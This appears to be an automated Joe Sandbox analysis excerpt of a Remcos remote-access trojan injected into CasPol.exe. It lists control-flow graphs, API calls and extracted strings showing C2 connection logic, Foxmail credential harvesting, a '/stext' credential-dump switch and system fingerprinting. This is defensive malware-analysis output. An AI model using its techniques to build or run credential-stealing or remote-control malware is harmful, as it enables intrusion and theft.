                                                                                                                      • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                      • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                      • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                      • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                      • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                      • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                      • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                      • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                      • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                      • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                      • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                      • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                                      • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                    • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-B3IX49$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                    • API String ID: 2830904901-1275367719
                                                                                                                    • Opcode ID: 0a1001e569a7cbca7338df23686525adbb7b77a70a010ea733eebdef583e623b
                                                                                                                    • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                                                                                                    • Opcode Fuzzy Hash: 0a1001e569a7cbca7338df23686525adbb7b77a70a010ea733eebdef583e623b
                                                                                                                    • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 494 413fd4-41401f call 401faa call 41aa83 call 401faa call 401d64 call 401e8f call 43a5f7 507 414021-414028 Sleep 494->507 508 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afd3 call 404262 call 401d64 call 40b125 494->508 507->508 523 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afd3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 508->523 524 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 508->524 577 41419a-4141a1 523->577 578 41418c-414198 523->578 524->523 579 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 577->579 578->579 606 414244-41428a WSAGetLastError call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 579->606 607 41428f-41429d call 4041f1 579->607 630 414b54-414b66 call 4047eb call 4020b4 606->630 612 4142ca-4142df call 404915 call 40428c 607->612 613 41429f-4142c5 call 401f66 * 2 call 41a696 607->613 629 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 4 call 41a97d call 413683 call 4082dc call 440c61 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 612->629 612->630 613->630 694 414434-414441 call 40541d 629->694 695 414446-41446d call 401e8f call 412513 629->695 643 414b68-414b88 call 401d64 call 401e8f call 43a5f7 Sleep 630->643 644 414b8e-414b96 call 401d8c 630->644 643->644 644->523 694->695 701 414474-4145a8 call 403b40 call 40cbf1 call 41adfe call 41aed8 call 41ad56 call 401d64 GetTickCount call 41ad56 call 41acb0 call 41ad56 * 2 call 41ac62 call 41aed8 * 5 call 40e679 695->701 702 41446f-414471 695->702 737 4145ad-414ac7 call 41aed8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 701->737 702->701 948 414ac9-414ad0 737->948 949 414adb-414ae2 737->949 948->949 952 414ad2-414ad4 948->952 950 414ae4-414ae9 call 40a767 949->950 951 414aee-414b20 call 405415 call 401f66 * 2 call 41a696 949->951 950->951 963 414b22-414b2e CreateThread 951->963 964 414b34-414b4f call 401eea * 2 call 401e13 951->964 952->949 963->964 964->630
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                    • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                    • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$ErrorLastLocalTime
                                                                                                                    • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-B3IX49$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                                    • API String ID: 524882891-3216469370
                                                                                                                    • Opcode ID: ced21c2e8dd1954c7f5a2ad987827925a75755a4da16d8746e6f1eb08308c3f5
                                                                                                                    • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                                                                                                                    • Opcode Fuzzy Hash: ced21c2e8dd1954c7f5a2ad987827925a75755a4da16d8746e6f1eb08308c3f5
                                                                                                                    • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 971 411c81-411cca GetModuleFileNameW call 401faa * 3 978 411ccc-411d56 call 41ab48 call 401e8f call 40c854 call 401eea call 41ab48 call 401e8f call 40c854 call 401eea call 41ab48 call 401e8f call 40c854 call 401eea 971->978 1003 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 978->1003 1026 411df8 1003->1026 1027 411dea-411df2 Sleep 1003->1027 1028 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1026->1028 1027->1003 1027->1026 1051 411e9a 1028->1051 1052 411e8c-411e94 Sleep 1028->1052 1053 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1051->1053 1052->1028 1052->1051 1076 411f3c-411f60 1053->1076 1077 411f2e-411f36 Sleep 1053->1077 1078 411f64-411f80 call 401e07 call 41b62a 1076->1078 1077->1053 1077->1076 1083 411f82-411f91 call 401e07 DeleteFileW 1078->1083 1084 411f97-411fb3 call 401e07 call 41b62a 1078->1084 1083->1084 1091 411fd0 1084->1091 1092 411fb5-411fce call 401e07 DeleteFileW 1084->1092 1094 411fd4-411ff0 call 401e07 call 41b62a 1091->1094 1092->1094 1100 411ff2-412004 call 401e07 DeleteFileW 1094->1100 1101 41200a-41200c 1094->1101 1100->1101 1102 412019-412024 Sleep 1101->1102 1103 41200e-412010 1101->1103 1102->1078 1106 41202a-41203c call 408339 1102->1106 1103->1102 1105 412012-412017 1103->1105 1105->1102 1105->1106 1110 412092-4120b1 call 401e13 * 3 1106->1110 1111 41203e-41204c call 408339 1106->1111 1122 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1110->1122 1111->1110 1117 41204e-41205c call 408339 1111->1117 1117->1110 1123 41205e-41208a Sleep call 401e13 * 3 1117->1123 1143 412125-41226f call 41aed8 call 41ad56 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1122->1143 1144 412274-41236b call 41aed8 call 4027ec call 4027cb * 6 call 40275c call 404468 call 401eea * 7 1122->1144 1123->978 1137 412090 1123->1137 1137->1122 1213 41236f-4123cf call 401eea call 401e13 call 401eea * 7 1143->1213 1144->1213 1243 4123d4-4123f6 call 401eea * 2 1213->1243
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                      • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                    • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                    • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                    • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                    • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                    • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                    • API String ID: 1223786279-3931108886
                                                                                                                    • Opcode ID: 8ba61eb44736636d62dfb388e49255975280aa85e724cfe8b41d178e08704754
                                                                                                                    • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                                                                                    • Opcode Fuzzy Hash: 8ba61eb44736636d62dfb388e49255975280aa85e724cfe8b41d178e08704754
                                                                                                                    • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                      • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                      • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                      • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                      • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                                    • API String ID: 672098462-2938083778
                                                                                                                    • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                    • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                    • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                    • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1286 40428c-4042ad connect 1287 4043e1-4043e5 1286->1287 1288 4042b3-4042b6 1286->1288 1291 4043e7-4043f5 WSAGetLastError 1287->1291 1292 40445f 1287->1292 1289 4043da-4043dc 1288->1289 1290 4042bc-4042bf 1288->1290 1293 404461-404465 1289->1293 1294 4042c1-4042e8 call 404cbf call 401f66 call 41a696 1290->1294 1295 4042eb-4042f5 call 420161 1290->1295 1291->1292 1296 4043f7-4043fa 1291->1296 1292->1293 1294->1295 1305 404306-404313 call 420383 1295->1305 1306 4042f7-404301 1295->1306 1299 404439-40443e 1296->1299 1300 4043fc-404437 call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 1296->1300 1302 404443-40445c call 401f66 * 2 call 41a696 1299->1302 1300->1292 1302->1292 1319 404315-404338 call 401f66 * 2 call 41a696 1305->1319 1320 40434c-404357 call 420f44 1305->1320 1306->1302 1349 40433b-404347 call 4201a1 1319->1349 1332 404389-404396 call 4202fa 1320->1332 1333 404359-404387 call 401f66 * 2 call 41a696 call 4205a2 1320->1333 1343 404398-4043bb call 401f66 * 2 call 41a696 1332->1343 1344 4043be-4043d7 CreateEventW * 2 1332->1344 1333->1349 1343->1344 1344->1289 1349->1292
                                                                                                                    APIs
                                                                                                                    • connect.WS2_32(?,00D8BF50,00000010), ref: 004042A5
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                    • API String ID: 994465650-2151626615
                                                                                                                    • Opcode ID: 8c905b45f271754ebccbf66324b392c02f54ace195c47071f909cd673dbb9e9f
                                                                                                                    • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                                    • Opcode Fuzzy Hash: 8c905b45f271754ebccbf66324b392c02f54ace195c47071f909cd673dbb9e9f
                                                                                                                    • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                    • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3658366068-0
                                                                                                                    • Opcode ID: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                    • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                                    • Opcode Fuzzy Hash: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                    • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1378 40c89e-40c8c3 call 401e52 1381 40c8c9 1378->1381 1382 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cc37 call 402860 * 2 call 401e13 * 5 1378->1382 1383 40c8d0-40c8d5 1381->1383 1384 40c9c2-40c9c7 1381->1384 1385 40c905-40c90a 1381->1385 1386 40c9d8 1381->1386 1387 40c9c9-40c9ce call 43ac1f 1381->1387 1388 40c8da-40c8e8 call 41a75b call 401e18 1381->1388 1389 40c8fb-40c900 1381->1389 1390 40c9bb-40c9c0 1381->1390 1391 40c90f-40c916 call 41b16b 1381->1391 1394 40c9dd-40c9e2 call 43ac1f 1383->1394 1384->1394 1385->1394 1386->1394 1399 40c9d3-40c9d6 1387->1399 1412 40c8ed 1388->1412 1389->1394 1390->1394 1403 40c918-40c968 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1391->1403 1404 40c96a-40c9b6 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1391->1404 1405 40c9e3-40c9e8 call 4082d7 1394->1405 1399->1386 1399->1405 1417 40c8f1-40c8f6 call 401e13 1403->1417 1404->1412 1405->1382 1412->1417 1417->1382
                                                                                                                    APIs
                                                                                                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath
                                                                                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                    • API String ID: 82841172-425784914
                                                                                                                    • Opcode ID: 8bb05b44eb04f1e0dc5581eb888e05d16a888ad6e7e27c2a6ee5d7172b9019e7
                                                                                                                    • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                                                                                    • Opcode Fuzzy Hash: 8bb05b44eb04f1e0dc5581eb888e05d16a888ad6e7e27c2a6ee5d7172b9019e7
                                                                                                                    • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                      • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                      • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                      • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                      • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                    • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                    • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                    • API String ID: 782494840-3211212173
                                                                                                                    • Opcode ID: 58cbcf3e76cd6df053c5a7a4d93357dae42d9101192a42edf8ababb2cf916475
                                                                                                                    • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                                                                                    • Opcode Fuzzy Hash: 58cbcf3e76cd6df053c5a7a4d93357dae42d9101192a42edf8ababb2cf916475
                                                                                                                    • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
